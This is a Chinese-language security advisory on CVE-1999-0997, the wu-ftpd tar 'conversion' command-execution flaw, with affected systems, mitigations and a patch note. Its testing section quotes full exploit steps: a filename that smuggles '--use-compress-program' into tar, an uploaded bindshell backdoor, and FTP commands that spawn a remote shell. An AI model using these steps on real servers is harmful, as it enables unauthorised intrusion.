首页 -> 安全研究
安全研究
安全漏洞
多家厂商FTP“转换”功能远程执行命令漏洞
发布日期:1999-12-20
更新日期:1999-12-20
受影响系统:
Washington University wu-ftpd 2.4.2 (beta 18) VR4描述:
- Caldera eDesktop 2.4
- Caldera eServer 2.3.1
- Caldera eServer 2.3
- Caldera Open Linux 2.4
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0 x86
Washington University wu-ftpd 2.5.0
- Caldera eDesktop 2.4
- Caldera eServer 2.3.1
- Caldera eServer 2.3
- Caldera Open Linux 2.4
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0 x86
- RedHat Linux 6.0 alpha
Washington University wu-ftpd 2.6.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux 4.2
- Conectiva Linux 4.1
- Conectiva Linux 4.0 es
- Conectiva Linux 4.0
- Debian Linux 2.2 arm
- Debian Linux 2.2 68k
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 alpha
- Debian Linux 2.2 sparc
- FreeBSD 4.4
- FreeBSD 4.3-STABLE
- FreeBSD 4.3-RELEASE
- FreeBSD 4.3
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 x86
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1
- RedHat Linux 6.1 x86
- RedHat Linux 6.0 x86
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0
- RedHat Linux 5.2 x86
- RedHat Linux 5.2
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 sparc
- SuSE Linux 7.3 powerpc
- SuSE Linux 7.3 sparc
- SuSE Linux 7.3 i386
- SuSE Linux 7.2
- SuSE Linux 7.2 i386
- SuSE Linux 7.1
- SuSE Linux 7.1 powerpc
- SuSE Linux 7.1 alpha
- SuSE Linux 7.1 sparc
- SuSE Linux 7.1 i386
- SuSE Linux 7.0 sparc
- SuSE Linux 7.0 i386
- SuSE Linux 7.0
- SuSE Linux 7.0 powerpc
- SuSE Linux 7.0 alpha
- SuSE Linux 6.4 alpha
- SuSE Linux 6.4
- SuSE Linux 6.3
- SuSE Linux 6.3 alpha
- SuSE Linux 6.2
- SuSE Linux 6.1 alpha
- SuSE Linux 6.1
- Turbo Linux 4.0
- Wirex Immunix OS Linux 6.2
BUGTRAQ ID: 2240
CVE(CAN) ID: CVE-1999-0997
一些FTP服务器提供一种“转换”功能,在把文件发送给用户之前,先把文件pipe给一个程序进行处理。
某些FTP服务器配置上存在漏洞,远程攻击者可以利用“转换”功能在服务器上执行任意命令。
FTP客户端请求获取一个文件名,其后跟随.tar/.tar.gz/.Z/.gz的时候,某些FTP Server会自动执行/bin/tar之类的程序去打包、压缩并下载给FTP客户端,这是通过管道实现的。而tar这样的命令有能力执行任意命令,入侵者通过请求一个特殊的文件名而使FTP Server启动远程shell。现在已知在某些平台(如Linux)下的wu-ftpd 2.6.0及以下版本FTP服务器和proftpd FTP服务器受此漏洞影响,利用这个漏洞需要攻击者有上传文件的权限。
<*来源:suid (suid@suid.edu)
链接:http://packetstormsecurity.nl/advisories/suid/001.txt
http://packetstormsecurity.nl/advisories/suid/001_addendum.txt
http://www.opennet.ru/base/netsoft/86.txt.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
With a valid FTP account only the server, the difficulty goes right down. You also have the added
benefit of not being stuck in a chroot() environment at the end. Local exploit time.
The exploit goes along much the same lines as the anonymous FTP exploit does:
Create a backdoor, using bindshell from our previous example:
$ gcc bindshell.c -o b -static
If you can perform a SITE CHMOD (default for normal non-anon users on wu-ftpd), then you can
use the following script example. Create a script to exec the desired commands:
$ cat > blah
#!/bin/bash
./b &
^D
Now create empty file "--use-compress-program=bash blah"
$ > "--use-compress-program=bash blah"
FTP to your target, login with your username/password. Upload your 3 files:
ftp> put b
ftp> put blah
ftp> put "--use-compress-program=bash blah"
Do a SITE CHMOD for b and blah:
ftp> quote SITE CHMOD 0755 b
ftp> quote SITE CHMOD 0755 blah
Now get your file:
ftp> get "--use-compress-program=bash blah".tar
Thats all there is to it. You now should have a shell on whatever port you specified.
---
An alternative exploit that bypasses the need to use SITE CHMOD has been suggested by SecuriTeam.com (this can be accomplished over anonymous FTP):
"This vulnerability is simple to exploit. However to exploit it you must be able to upload/download files. (e.g. a mode 0777 incoming directory).
For the purposes of this exploit you also need a shell in the remote path. For example, a RedHat machine with the anonftp package installed has exactly what you need.
First, assuming you are running the same platform as your target, statically compile some sort of backdoor program. A simple example is bindshell.c.
$ gcc bindshell.c -o b -static
Then, tar this up. You will need to tar it up because the remote side will rarely have the ability to change permissions at this stage.
(SITE CHMOD rarely works on anonymous ftp sites)
$ tar -cf b.tar b
Create a script of things you want to do on the remote site, this will be interpreted by bash or sh.
$ cat > blah
#
/bin/tar -xf b.tar
./b
^D
Leave the first line as a comment.
Create a empty file called "--use-compress-program=sh blah"
$ > "--use-compress-program=sh blah"
Connect to your target ftp server.
$ ftp localhost
Connected to localhost.
220 localhost.localdomain FTP server (Version wu-2.6.0(1) Tue Sep 21 10:10:10 EDT 2000) ready.
Name (localhost:suid): ftp
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
Change to your world writeable directory:
ftp> cd /incoming
Store your files:
ftp> put blah
ftp> put b.tar
ftp> put "--use-compress-program=sh blah"
Now using TAR conversion, get your "--use-compress-program=sh blah" file.
ftp> get "--use-compress-program=sh blah".tar
It should open a connection then freeze. Now telnet to your bindshell port."
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 这种入侵技术要求可以上载文件,正确配置FTP Server,禁止用户上载文件。
* 配置FTP服务器,取消用户在服务器端执行压缩和解压的能力。
厂商补丁:
Washington University
---------------------
目前厂商已经最新版本的软件中修复了这个安全问题,请到厂商的主页下载:
http://www.wu-ftpd.org/
浏览次数:8428
严重程度:0(网友投票)
绿盟科技给您安全的保障